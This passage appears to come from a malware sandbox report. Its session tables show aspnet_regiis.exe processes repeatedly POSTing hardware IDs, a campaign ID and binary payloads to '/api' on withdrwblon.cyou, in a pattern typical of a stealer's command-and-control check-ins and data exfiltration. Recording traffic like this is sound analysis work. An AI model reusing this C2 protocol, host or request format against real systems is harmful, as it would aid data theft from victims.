12	192.168.2.5	49716	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:07 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: withdrwblon.cyou
2024-10-24 19:59:07 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:07 UTC	5237	OUT	Data Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-24 19:59:08 UTC	1009	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qatjqvpbsj61uuiald06g5lqb5; expires=Mon, 17 Feb 2025 13:45:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYJaNatkhz88rqO7%2BPspVy4AQIrm%2BIggMKgrBQLt0ehbvZiK9aQrCvICvpLiPUFMB1oOetq6uTqYBEE42ItlWlJmew0Cvgz8MgKEyrMxOpPbMbu7HObLGu4kQNrRCFszmrf0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8ba93db4e7d7-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21530&delivery_rate=2219157&cwnd=250&unsent_bytes=0&cid=2e4872c8d628bb42&ts=722&x=0"
2024-10-24 19:59:08 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49717	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:08 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15078 Host: withdrwblon.cyou
2024-10-24 19:59:08 UTC	15078	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:09 UTC	1018	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ag35uj3kot071t3lgsucbtns8f; expires=Mon, 17 Feb 2025 13:45:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32DBzn%2FHbv1PCWMPRjstd3zGCA8uPZreNgLRMBKaBgNpTKl5ZhyR%2F%2BjriafPKEcuYk0UDV0FQ0J6HsCaKUc%2F%2BbixAEF5SO8hcdX6RheCD8wahJdJnUZRBAAA3kksh%2ByJQUb%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bb0bfdc6b5e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=8&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16018&delivery_rate=2401326&cwnd=251&unsent_bytes=0&cid=771fb1bc1172d7ae&ts=584&x=0"
2024-10-24 19:59:09 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49718	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:09 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1249 Host: withdrwblon.cyou
2024-10-24 19:59:09 UTC	1249	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:09 UTC	1010	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qain1hn5h9jru76b3d0qsvfl9s; expires=Mon, 17 Feb 2025 13:45:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lG%2BacIQ4fg3M41WfB49M6xZyTM7n46aG20fG2YGsFCrb61PuVE0bwidTRtFNPTmaWu1YepMGHMM6Eb7x6PImGZpQqfWEJ3qsyLOM1C%2FSFRDZvs5H%2FjvRUm%2F8v3gkUuI7K6C6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bb42a8c2cc3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2166&delivery_rate=2544815&cwnd=251&unsent_bytes=0&cid=4a45896d8eabf320&ts=535&x=0"
2024-10-24 19:59:09 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49719	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:09 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1249 Host: withdrwblon.cyou
2024-10-24 19:59:09 UTC	1249	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:09 UTC	1013	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rnjn3n7rukgd90lna403hgj72a; expires=Mon, 17 Feb 2025 13:45:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpbD%2BFUJ5rdAv15gs1crSLS8wyX00NGyt9zCsrGY8AMlO2UswNRj1JemhjCd%2BdHSwo739PaiXAHamM2nkSn4ZoXd%2F%2F4j3ULn5BAUHmkG%2FFU%2BLbmJ4GJBxZmr52a8HU37hVki"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bb56b43bf75-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17286&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2166&delivery_rate=167553&cwnd=32&unsent_bytes=0&cid=5db9e8a4b0e1f95d&ts=353&x=0"
2024-10-24 19:59:09 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49720	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:10 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: withdrwblon.cyou
2024-10-24 19:59:10 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:10 UTC	5237	OUT	Data Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-24 19:59:11 UTC	1011	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=90kbngg6j8f26ihba26h3bt9gq; expires=Mon, 17 Feb 2025 13:45:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cytl2R%2FEkwFjk1SsbhOxjsxeNzZ%2Bx3zDiDjpZ6T0WsjDHZVUfMO8nx9tBdU18rrKwveI5Djj588KzyUzsdnYqur2FcYRRwJcJQhrlymEAPADUjReSzEWTrchpph4lCl9tuq%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bba5dc8e583-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1293&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21530&delivery_rate=2182366&cwnd=251&unsent_bytes=0&cid=86c8050a3c5798b3&ts=716&x=0"
2024-10-24 19:59:11 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49722	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:11 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1134 Host: withdrwblon.cyou
2024-10-24 19:59:11 UTC	1134	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:12 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a8sqftq97sqkio0de83ibg4bn5; expires=Mon, 17 Feb 2025 13:45:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgRw9he1%2FQQcUzapr0BT8ZqLtc64tcHLJcgUxjZ8vfmcRFj490OUcpdaMIEBt5ubjBjINwUT47DFgR9jNpZ28GJlH7pWMRgnkDJuzmE4hbRf0%2BTxGKC5uFqEYTP20AFcB1Bv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bc52d40bcfc-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2051&delivery_rate=145381&cwnd=32&unsent_bytes=0&cid=902883bb5fb0aa58&ts=2115&x=0"
2024-10-24 19:59:12 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49721	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:11 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1134 Host: withdrwblon.cyou
2024-10-24 19:59:11 UTC	1134	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:13 UTC	1010	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rum1q2gvlibei7hbi84bhurll3; expires=Mon, 17 Feb 2025 13:45:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBlFbCXFifhSpC0CGJOfM7ASyGejmLWv%2FjY%2BpwJhzR3%2FCaAsP%2B0uNnMZERM5e2gYHpBucOTSBDqcWpemwsuD915ulGPbpVCgx0J0x3XohtmQRQFAuqhSiBSMnXGAaImW21CI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bc52ba5bd1b-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18268&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2051&delivery_rate=157940&cwnd=32&unsent_bytes=0&cid=7eddd9deb4ff5cee&ts=2615&x=0"
2024-10-24 19:59:13 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49723	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:12 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1249 Host: withdrwblon.cyou
